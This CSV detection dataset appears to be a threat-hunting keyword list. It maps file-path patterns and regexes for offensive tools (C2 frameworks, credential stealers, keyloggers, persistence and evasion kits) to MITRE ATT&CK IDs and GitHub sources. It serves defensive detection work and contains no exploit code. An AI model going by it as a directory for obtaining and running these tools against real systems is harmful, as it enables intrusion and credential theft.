"*\SOAPHound\Program.cs*",".{0,1000}\\SOAPHound\\Program\.cs.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\SOAPHound-master*",".{0,1000}\\SOAPHound\-master.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\socks5proxy.py*",".{0,1000}\\socks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\Software\Kidlogger*",".{0,1000}\\Software\\Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","registry","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Xworm*",".{0,1000}\\SOFTWARE\\Xworm.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\SortObjectCommand.cs",".{0,1000}\\SortObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\spellbound-main*",".{0,1000}\\spellbound\-main.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spellgen.py *",".{0,1000}\\spellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spellstager.py *",".{0,1000}\\spellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spider_plus.py*",".{0,1000}\\spider_plus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\spoof.py*",".{0,1000}\\spoof\.py.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","0","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" "*\SpoofCmdLine\TheThing*",".{0,1000}\\SpoofCmdLine\\TheThing.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*\spoofing-office-macro-master*",".{0,1000}\\spoofing\-office\-macro\-master.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*\spoofIPs_client.py*",".{0,1000}\\spoofIPs_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\spooler.py*",".{0,1000}\\spooler\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\SprayAD.cna*",".{0,1000}\\SprayAD\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*\SprayAD.exe*",".{0,1000}\\SprayAD\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*\sprayed-creds.txt*",".{0,1000}\\sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*\spray-results.txt*",".{0,1000}\\spray\-results\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\SQLInfoDumps*",".{0,1000}\\SQLInfoDumps.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\SQLRecon*",".{0,1000}\\SQLRecon.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*\src\check\Credentials.ps1*",".{0,1000}\\src\\check\\Credentials\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*\src\KaynInject.c*",".{0,1000}\\src\\KaynInject\.c.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\src\KaynLdr.c*",".{0,1000}\\src\\KaynLdr\.c.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\src\KaynStrike.c*",".{0,1000}\\src\\KaynStrike\.c.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\src\links\windows\src\evasion.rs*",".{0,1000}\\src\\links\\windows\\src\\evasion\.rs.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*\Src\Recon-AD-Groups\*",".{0,1000}\\Src\\Recon\-AD\-Groups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Src\Recon-AD-Users\*",".{0,1000}\\Src\\Recon\-AD\-Users\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\stager.ps1*",".{0,1000}\\stager\.ps1.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*\StandIn --*",".{0,1000}\\StandIn\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn.exe*",".{0,1000}\\StandIn\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn.pdb*",".{0,1000}\\StandIn\.pdb.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn\hStandIn.cs*",".{0,1000}\\StandIn\\hStandIn\.cs.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn\Program.cs*",".{0,1000}\\StandIn\\Program\.cs.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn_Net35.exe*",".{0,1000}\\StandIn_Net35\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn_Net45.exe *",".{0,1000}\\StandIn_Net45\.exe\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn-1.3.zip*",".{0,1000}\\StandIn\-1\.3\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\stardust.x64.bin*",".{0,1000}\\stardust\.x64\.bin.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*\stardust.x64.exe*",".{0,1000}\\stardust\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*\Stardust\scripts\loader.x64.exe*",".{0,1000}\\Stardust\\scripts\\loader\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*\start_campaign.py*",".{0,1000}\\start_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*\StayKit.cna*",".{0,1000}\\StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*\Stealer.exe*",".{0,1000}\\Stealer\.exe.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*\Stealer.sln*",".{0,1000}\\Stealer\.sln.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*\Stealer\modules\Passwords.cs*",".{0,1000}\\Stealer\\modules\\Passwords\.cs.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*\Stealer\Stealer\modules\*",".{0,1000}\\Stealer\\Stealer\\modules\\.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*\StealTokenClient.exe*",".{0,1000}\\StealTokenClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\StealTokenDrv.cpp*",".{0,1000}\\StealTokenDrv\.cpp.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\StealTokenDrv.exe*",".{0,1000}\\StealTokenDrv\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\stickykey.ps1*",".{0,1000}\\stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*\Stickykeys.sh*",".{0,1000}\\Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\StickyNotesExtract.exe*",".{0,1000}\\StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\StolenPasswords.txt*",".{0,1000}\\StolenPasswords\.txt.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\Stompy.ps1*",".{0,1000}\\Stompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*\StomPY.py*",".{0,1000}\\StomPY\.py.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*\Stompy-main\*",".{0,1000}\\Stompy\-main\\.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*\StopProcessCommand.cs",".{0,1000}\\StopProcessCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Stowaway\admin\*",".{0,1000}\\Stowaway\\admin\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\Stowaway\agent\*",".{0,1000}\\Stowaway\\agent\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\Stowaway\ansicon\*",".{0,1000}\\Stowaway\\ansicon\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\Suborner.sln*",".{0,1000}\\Suborner\.sln.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","0","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*\Supernova.exe*",".{0,1000}\\Supernova\.exe.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*\Supershell.tar.gz*",".{0,1000}\\Supershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*\Supershell\rssh\pkg\*",".{0,1000}\\Supershell\\rssh\\pkg\\.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*\Supershell\rssh\pkg\*",".{0,1000}\\Supershell\\rssh\\pkg\\.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*\SweetPotato.exe*",".{0,1000}\\SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 